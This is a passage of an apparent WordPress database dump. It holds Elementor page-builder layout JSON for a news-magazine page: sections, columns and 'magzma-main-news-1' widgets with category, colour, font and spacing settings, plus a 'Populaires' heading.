eight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_border_border\":\"dotted\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1346,473,'_elementor_version','0.4'),(1347,474,'_elementor_edit_mode','builder'),(1348,474,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\